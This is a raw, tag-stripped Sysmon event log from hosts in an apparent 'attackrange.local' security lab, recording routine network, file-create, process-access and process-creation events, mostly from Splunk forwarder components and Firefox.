SERVICEtcpfalsefalse89.248.165.74recyber.net18051-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809482Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:47.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7A70AE55970240E81FC0ABB6637EFAC,SHA256=03CB65FAFFEB17EB9BC9A42338857870CAE6EC1183F85751877C52D18F953D5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:39.307{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57399-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001052759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:48.553{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F2E206DFE86A3F80F334C83DDACB74,SHA256=3D858E436262EC43924A213861656F1609E3FB5FB379A48D3BA6DDBDD2E5F705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:48.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758277FC593B9A4D9735D36C07DC8423,SHA256=EE6E837287B4489BC43BB7FE0E44FA6967DE620384731BF831E5DD216061A977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4FA650E906FD3F48BAD2E10D3DD30CC7,SHA256=E2E1EB59649AA757E31F42523CC2D9877BF7C7793AD0689743F2700C85D33640,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C1C18BF13A157E5464D4F981529E9591,SHA256=0CEB1C8C0D59448FB8CE06F998F77A610172D4653FEF7FC60196DAEA5BAD091F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=72A6986AD10268D2A72F1C7C8DE7B0AE,SHA256=E259128998FC42BD0F7A0650251DF62E81E619BD098188DD013A942CFB100170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.921{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3E4F1FCDD286E219F0B2489AEE319CE2,SHA256=66601283A6AA56001536E8DAAD6F688E6A8BA23AF0939B2464DC50289FED9879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E185CF8218E6707D0837FEED9AA67967,SHA256=A68D0ECE16F14708F39775D714B93FBEAB764BE2080ADFD17DC80DA7E8885C4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D01E9BB3A57DAD1A4598DB5C66DAFD7A,SHA256=F396A37CBBF9A6E7B39279607B449703F48891EC1D62C6C4E696C0D5BFC3620A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=67AED841966AF2CECE33A7D9DD43991E,SHA256=66CCF414C8BF3C68DB7F4B199EA271FCCCCD365691D3F3715B3E756DCF5C66EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=448DD78F7983BC3472FA95C8F4F695D5,SHA256=3C6649170371CEDD5A07289E5933818F399E55BE3D934CCAB94C8D7488F9EB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC1E1D4F77D2FCC9C721027EBFD13C0A,SHA256=B2231DD490DBF09DD69A02932A9E53F5F8C5494C69B627D3AB5273ED05D02A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE63F6B561151369A68AAE6B76D67044,SHA256=BE8E81DE43DC4FBCD45122F1E0E9EDA9E60114B9F54593F1DF35300D82B172A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14C969283FAFDC8E6556A1443C9143CB,SHA256=DBF5DF97336238E07B575A18915F6E553ABC7B74511DEC4CF1F28D678AC5D73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BB0368390092D977A897F2E82330D0,SHA256=247F410D153118EEB10229E57F1DFD872BD6858495603833092D4C2C2850DE06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:48.274{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57400-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:49.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126BBE9E0B150482C1FC9D481F5B8CDD,SHA256=7759DB5E3D28E78A5FF58D72187EBBF3CBF89401FF1E5018231A5DD71FD4CB40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.942{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.923{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1320FBFE6450B3C0E8A75CD52BD733AD,SHA256=5DD6684265038E960ED363D7442C5FE0EC1390244FE86B899A724D7757C16C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:50.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F009743A8F170A2E1BA177C97F4D0D9D,SHA256=009BC9BEB2F4E2EDB73132A1160AB06F88EDD7D9608B341843B7123F0095ADE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:50.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4AFF5314E38B441528D5040F206303,SHA256=784AB05D0179A67589022E42491D472C80E3A422EC8C592B761A834402BBE5FE,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001052780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.552{466BC892-F72A-60EB-BB7D-00000000CF01}75766852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.305{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:02:50.289{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.284{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
